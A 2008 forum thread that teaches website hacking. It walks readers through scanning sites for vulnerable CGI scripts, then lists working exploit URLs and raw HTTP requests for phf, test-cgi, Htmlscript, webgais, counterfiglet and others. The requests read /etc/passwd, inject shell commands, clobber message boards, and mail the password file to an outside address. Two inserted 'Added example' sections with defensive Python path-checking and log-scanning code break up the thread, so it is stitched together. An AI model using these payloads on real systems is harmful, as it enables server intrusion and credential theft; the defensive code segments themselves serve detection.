How to hack a website from A to Z


Posted by root on Thursday, August 14, 2008 3:45 am

Use this program to search for vulnerabilities:
Cgi Scanner 4.0
and not cgi scan
It is a great program, and I have tried it on 3 sites.

The link

After choosing the site and the vulnerabilities appear,

from the File menu, choose save result.

Go to the file that contains the results; you will find it looks like this:

GenerelSettings,0
FontColSettings,"clBlack,0,0,0,clBlack","clBlack,0,0,0,clBlack","clBlack,0,0,0,clBlack","clBlack,0,0,0,clBlack","clBlack,0,0,0,clBlack","clBlack,0,0,0,clBlack"
FontRowSettings,"clBlack,0,0,0,clBlack","clBlack,0,0,0,clBlack","clBlack,0,0,0,clBlack","clBlack,0,0,0,clBlack","clBlack,0,0,0,clBlack","clBlack,0,0,0,clBlack","clBlack,0,0,0,clBlack","clBlack,0,0,0,clBlack","clBlack,0,0,0,clBlack","clBlack,0,0,0,clBlack","clBlack,0,0,0,clBlack","clBlack,0,0,0,clBlack","clBlack,0,0,0,clBlack","clBlack,0,0,0,clBlack","clBlack,0,0,0,clBlack","clBlack,0,0,0,clBlack","clBlack,0,0,0,clBlack"
UserSettings
528,401,196,50,56,85,127,184,115
URL,STATUS,METHOD,SCRIPT,DESC
http://www.***.com,200,GET,,8080/index.js%2570
http://www.***.com,200,GET,,8080/examples/jsp/num/numguess.js%70
http://www.***.com,200,GET,,8765/example/
http://www.***.com,200,GET,,8765/index.html
http://www.***.com,200,GET,,2301/survey
http://www.***.com,200,GET,,8987/sawmill
http://www.***.com,200,GET,,8080/.jsp/WEB-INF/classes/Env.java
http://www.***.com/_vti_inf.html,200,GET,/_vti_inf.html,"Frontpage98 Hole(_vti_inf.html)"

,,,,
,,,,

If the site only has scripts, you will not find this example:
http://www.***.com/_vti_inf.html,200,GET,/_vti_inf.html,"Frontpage98 Hole(_vti_inf.html)"
The vulnerability name and the word hole must be present.
If you do not find them,
then the results are of no importance.


When a vulnerability is present, such as this one (the FrontPage hole),
we conclude from it:
http://www.***.com the site name
/_vti_inf.html the vulnerability
GET,/_vti_inf.html the command to get the page (or the file)
All we have to do is take up to this part
http://www.***.com/_vti_inf.html,200,GET,/_vti_inf.html
and type it into the browser.
The rest,
"Frontpage98 Hole(_vti_inf.html)"
is the name of the vulnerability.
To get more information about this vulnerability,
go to the following sites and type in the vulnerability name, and it will give you very thorough information about it,
including the admin's username and password:
http://www.securitywire.com
http://packetstormsecurity.nl


And this is an explanation of some vulnerabilities.
I think it does not need translation.
-<>-
PHF

A script which came as standard with the popular Apache web server, also contained a serious flaw. Incorrect parameter checks are done, and therefore literally any command you want can be executed on the system.

Exploit:

Using the URL:

/cgi-bin/phf?Qalias=x%0a/bin/cat%20/etc/passwd

will display the password file from the server.

-<>-
Test-cgi

Anyone can remotely inventory the files on a machine.

Exploit:

Using the URL: /cgi-bin/test-cgi?*

will display the contents of the server's CGI directory.

Using the URL: /cgi-bin/test-cgi?/*

will display the contents of the server's root directory.

Both listings will be displayed via the QUERY_STRING field, however, it is also possible to get listings via the CONTENT_TYPE, CONTENT_LENGTH, HTTP_ACCEPT, HTTP_REFERER, PATH_INFO, PATH_TRANSLATED, REQUEST_METHOD, SERVER_PROTOCOL, and (with the help of rDNS) the REMOTE_HOST field.

For example, to get a listing of the root directory via the SERVER_PROTOCOL field, you would telnet to the server on port 80 and use:

GET /cgi-bin/test-cgi?x> /*

-<>-
Fax Survey

If the HylaFAX package is installed (common on some older Linux distributions), you can send arbitrary commands running as the UID of the web server:

Exploit:

/cgi-bin/faxsurvey?/bin/cat%20/etc/passwd

The above example URL could expose the passwd file of the server.

-<>-
Dump

This program, written in perl, displays general environment information about the system on which a Web server resides. This information may include the version of Web server software being used, path information and information about the system's directory settings.

-<>-
Handler

A small perl program that allows (in theory) to read and download files under the system's root directory. In fact it allows you to execute any command remotely on the target machine.

Exploit:

GET /cgi-bin/handler/useless_stuff;cat /etc/passwd| ?data=Download

Telnetting to the server on port 80 and typing the above will give you the server's password file.

-<>-
Netauth

Netauth is a web based email management system for Windows NT and most Unix platforms. This product contains a security hole that enables remote users to download local files, including files like /etc/shadow.

Exploit:

http://www.example.com/cgi-bin/netauth.cgi?cmd=show&page=../../../../../../../../../etc/passwd

The above URL would retrieve the passwd file from the server.

-<>-
Calender.pl

The vulnerability allows remote users to execute arbitrary commands on the web server with the privileges of the httpd process.

The calender_admin.pl script prompts the user for a configuration file to modify, and then in an attempt to authenticate the user, it passes the user input straight to perl open(). This can be easily exploited to execute arbitrary commands remotely.

Exploit:

http://www.example.com/cgi-bin/calender_admin.pl

Going to that URL will result in a username/password/configuration file input fields. Ignoring username and password, enter:

|<command here>|
(With the pipes) in the configuration file field.

For example:
|ping 127.0.0.1|

and the command will be executed.

-<>-
HTML Script

Htmlscript has a vulnerability in it which allows you to access system files, presumably any file the web server user can access.

Exploit:

http://www.vulnerable.server.com/cgi-bin/htmlscript?../../../../etc/passwd

The above URL would get the passwd file from the server.

-<>-
wwwboard.pl

There is no input checking done on the list of articles which a given article is a followup to. This allows us to give it invalid input such that we can clobber files that the web server has write permissions to.

For example, this HTML snippet, when read by Netscape (and the button is pushed), will clobber articles 1 to 5 on the wwwboard at some.poor.host.

<form method=POST action="http://some.poor.host/cgi-bin/wwwboard.pl">
<input type=hidden name="followup" value="1,2,3,4,5,|.|">
<input type=submit value="Clobber web board">
</form>

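Added example (not part of the original post, and not code from any of the scripts it lists): the Netauth, Htmlscript and calender_admin.pl entries above all come down to a client-supplied file name reaching a file-open call unchecked. One way a handler can confine such a name to a base directory, sketched in Python; `resolve_under`, `audit`, `RejectedPath` and the sample values are assumptions made for this illustration, and the NUL-byte check goes beyond the entries in this post.

```python
import os

class RejectedPath(ValueError):
    """Raised when a client-supplied file name fails validation."""

def resolve_under(base_dir, user_value):
    """Return the real path of user_value inside base_dir, or raise RejectedPath."""
    # A NUL byte truncates the name in C-level file APIs, so refuse it outright.
    if "\x00" in user_value:
        raise RejectedPath("NUL byte in file name")
    # Perl's two-argument open() treats a leading or trailing '|' (and '<', '>')
    # as a mode; refuse such characters instead of trying to escape them.
    if any(ch in user_value for ch in "|<>;&`$\n\r"):
        raise RejectedPath("shell or open() metacharacter in file name")
    if os.path.isabs(user_value):
        raise RejectedPath("absolute path not allowed")
    base = os.path.realpath(base_dir)
    # realpath collapses "../" runs and follows symlinks before the comparison.
    candidate = os.path.realpath(os.path.join(base, user_value))
    if os.path.commonpath([base, candidate]) != base:
        raise RejectedPath("path escapes the base directory")
    return candidate

# Constructed inputs modelled on parameter values of the kind quoted above.
SAMPLES = ["site.conf", "../../../../etc/passwd", "|ping 127.0.0.1|",
           "/etc/passwd\x00"]

def audit(base_dir, values=SAMPLES):
    """Map each value to 'accepted' or to the reason it was rejected."""
    results = {}
    for value in values:
        try:
            resolve_under(base_dir, value)
            results[value] = "accepted"
        except RejectedPath as exc:
            results[value] = str(exc)
    return results

if __name__ == "__main__":
    import tempfile
    with tempfile.TemporaryDirectory() as d:
        for value, verdict in audit(d).items():
            print(repr(value), "->", verdict)
```

The returned path should then be opened with an explicit read mode (in Perl, the three-argument `open`), so that no character in the name can select a pipe.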

Re: How to hack a website from A to Z

Posted by root on Thursday, August 14, 2008 3:46 am

-<>-
Finger

Get a list of e-mail addresses you found for the site (let's pretend one of them is "kangaroo@acme.net", and that your email address is "your@email.org")

Go to the finger box, and type this in (changing these email addresses for the real ones):

kangaroo@acme.net ; /bin/mail your@email.org < etc/passwd

This takes the passwd file through kangaroo@acme.net and emails it to your email address. If this works you now have the etc/passwd file in your mailbox.

-<>-
bnbform.cgi

BNBForm is a form processing cgi by BigNoseBird. The problem is that this form sends a responding email to users with the contents of any file contained in the 'automessage' variable. This can be used to specify any file that is readable by the uid of the webserver.

Exploit:

The exploit is an html form, but was too large to include here. Please search for "bnbform exploit" at a good search engine to get the code.

-<>-
survey.cgi

BNBSurvey is a CGI for doing simple surveys. This script has 2 modes of operation - the first being that people can vote as many times as they like, and the second being that the people can only vote once every hour. The first operation is the default.

If this second mode of operation is enabled though, remote users can use metacharacters in the 'filebase' variable to execute arbitrary commands (i.e. if $ENFORCEMENT = "1" is set in the CGI script).

Exploit:

This exploit code was too large to include, please search for "bnbsurvey exploit" at a good search engine.

-<>-
classifieds.cgi

Classifieds is a free cgi script for handling classified ads. There are multiple security holes in this that allow remote execution. Firstly, by setting your email address as something like "duke@viper.net.au</etc/passwd" you can read files remotely off the server.

Also, by setting the hidden variables on an HTML form, a remote user can force arbitrary commands to be executed. One example of this is modifying the following variable:

<input type="hidden" name="mailprog" value="/usr/sbin/sendmail">

Changing its value to another command will cause that alternate command to be executed.

-<>-
textcounter.pl

Textcounter allows anybody to execute commands on your system with the same rights as the httpd daemon.

-<>-
Count.cgi

There are at least two buffer overflow vulnerabilities in wwwcount, a widely used CGI web counter. The most harmful occurs when the QUERY_STRING environment variable (which reflects the URL asked by the www client) is copied to a fixed-size dynamic buffer. Another one occurs only when the counter is compiled with a special authentication option, and may not be exploitable.

-<>-
WebGais

WebGais is an interface to the GAIS search tool. It installs a few programs in /cgi-bin. The main utility is called "webgais" and does the actual interfacing with the search tool.

It reads the query from a user form, and then runs the GAIS search engine for that query. The author tried to protect the program by using single quotes around the query when he passed it to a "system" command. But he forgot one VERY important thing: to strip single quotes from the query (this was done in Glimpse).

Exploit:

telnet target.machine.com 80
POST /cgi-bin/webgais HTTP/1.0
Content-length: 85 (replace this with the actual length of the "exploit"
line)

query=';mail+drazvan\@pop3.kappa.ro</etc/passwd;echo'&output=subject&domain=paragraph

-<>-
Web Sendmail

Websendmail is a cgi-bin that comes with the WEBgais package, which is an interface to the GAIS search tool. It is a PERL script that reads input from a form and sends e-mail to the specified destination.

Exploit:

telnet target.machine.com 80
POST /cgi-bin/websendmail HTTP/1.0
Content-length: xxx (should be replaced with the actual length of the
string passed to the server, in this case xxx=90)

receiver=;mail+your_address\@somewhere.org</etc/passwd;&sender=a&rtnaddr=a&subject=a&content=a

-<>-
CGI Counter

The popular CGI web page access counter version 4.0.7 by George Burgyan allows execution of arbitrary commands due to unchecked user input. Commands are executed with the same privilege as the web server, but other exploits can be used to get root access on an unpatched OS.

Exploit:

Using straight URL
http://www.example.com/cgi-bin/counterfiglet/nc/f=;echo;w;uname%20-a;id
(This will display the uname of a given system)

Passing commands in a variable:
$ telnet www.example.com www
GET /cgi-bin/counterfiglet/nc/f=;sh%20-c%20"$HTTP_X" HTTP/1.0
X: pwd;ls -la /etc;cat /etc/passwd

$ telnet www.example.com www
GET /cgi-bin/counter/nl/ord/lang=english(1);system("$ENV{HTTP_X}"); HTTP/1.0
X: echo;id;uname -a;w

-<>-
SGI infosrch

The Infosearch subsystem is used to search and browse virtually all SGI on-line documentation. A vulnerability has been discovered in infosrch.cgi which could allow any remote user to view files on the vulnerable system with privileges of the user "nobody".

-<>-
Poll It

Poll It allows easy hosting of online polls on websites. However this CGI also enables remote attackers to read any world readable file on the server.

Exploit:

/cgi-bin/pollit/Poll_It_SSI_v2.0.cgi?data_dir=/etc/passwd%00

The above URL would retrieve the passwd file from the server.

-<>-
Robpoll

Robpoll is a free cgi based admin program.

Exploit:

First go to:

http://www.example.com/cgi-bin/robpoll.cgi?Admin

You will have an option to change the password. The password by default is "robpoll"; leaving this password thus compromises the system and its files.

-<>-
WebBanner

A security hole in the WebBanner CGI enables remote attackers to view certain files on the system, and possibly execute system commands as well.

Exploit:

http://www.example.com/random_banner/index.cgi?image_list=alternative_image.list&html_file=../../../../../etc/passwd

The above URL will retrieve the passwd file from the server.

-<>-
WebWho+

WebWho+ is a free cgi script for executing whois queries via the www. Though it does perform checks for shell escape characters on some parameters, it misses the 'type' variable and allows for malicious input to be sent to a shell. It is possible to execute arbitrary commands on a webserver running WebWho+ v1.1 with the uid of the webserver (usually nobody).

-<>--<>-
Useful sites
Http://www.securityfocus.com
Http://www.packetstormsecurity.org

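Added example (not part of the original thread): requests like the ones catalogued in these two posts leave a recognisable trace in a web server's access log. The Python sketch below flags Common Log Format lines that name one of the listed scripts or carry traversal, NUL-byte, newline or shell-metacharacter payloads after URL decoding; the log lines, client addresses and the `scan` function are constructed for this illustration.

```python
import re
from urllib.parse import unquote

# Script names from the catalogue above, matched as whole path segments.
LEGACY_CGI = {"phf", "test-cgi", "faxsurvey", "handler", "netauth.cgi",
              "calender_admin.pl", "htmlscript", "wwwboard.pl", "webgais",
              "websendmail", "counterfiglet", "poll_it_ssi_v2.0.cgi", "robpoll.cgi"}
INDICATORS = {
    "traversal": re.compile(r"\.\./"),
    "nul-byte": re.compile(r"\x00"),
    "newline": re.compile(r"[\r\n]"),
    "shell-meta": re.compile(r"[;|`]"),  # noisy on sites that use ';' in URLs
    "sensitive-file": re.compile(r"/etc/(?:passwd|shadow)"),
}
# Common Log Format; the request target may contain raw spaces.
CLF = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "(\S+) (.*?)(?: HTTP/[\d.]+)?" (\d{3}) ')
# Constructed log lines; the request targets reuse strings quoted in the posts.
SAMPLE_LOG = [
    '192.0.2.10 - - [14/Aug/2008:03:45:00 +0000] "GET /cgi-bin/phf?Qalias=x%0a/bin/cat%20/etc/passwd HTTP/1.0" 404 210',
    '192.0.2.10 - - [14/Aug/2008:03:45:02 +0000] "GET /cgi-bin/htmlscript?../../../../etc/passwd HTTP/1.0" 200 1320',
    '198.51.100.7 - - [14/Aug/2008:03:47:09 +0000] "GET /cgi-bin/pollit/Poll_It_SSI_v2.0.cgi?data_dir=/etc/passwd%00 HTTP/1.0" 404 210',
    '198.51.100.7 - - [14/Aug/2008:03:47:10 +0000] "GET /cgi-bin/handler/useless_stuff;cat /etc/passwd| ?data=Download" 400 0',
    '203.0.113.9 - - [14/Aug/2008:03:50:00 +0000] "GET /index.js%2570 HTTP/1.0" 200 812',
    '203.0.113.9 - - [14/Aug/2008:03:50:05 +0000] "GET /index.html HTTP/1.1" 200 5120',
]

def scan(lines):
    """Return (client, script, tags, served) for each suspicious request."""
    findings = []
    for line in lines:
        m = CLF.match(line)
        if not m:
            continue
        ip, _method, target, status = m.groups()
        once = unquote(target)
        twice = unquote(once)  # second pass exposes double encoding (%2570)
        tags = [name for name, rx in INDICATORS.items() if rx.search(twice)]
        if twice != once:
            tags.append("double-encoded")
        segments = twice.split("?", 1)[0].lower().split("/")
        script = next((s for s in segments if s in LEGACY_CGI), None)
        if script or tags:
            # A 200 means something answered the request: triage those first.
            findings.append((ip, script, tags, status == "200"))
    return findings

if __name__ == "__main__":
    for finding in scan(SAMPLE_LOG):
        print(finding)
```

A hit with `served` set to true is the one to follow up first: it means the script or file is actually present on the server and should be removed or patched.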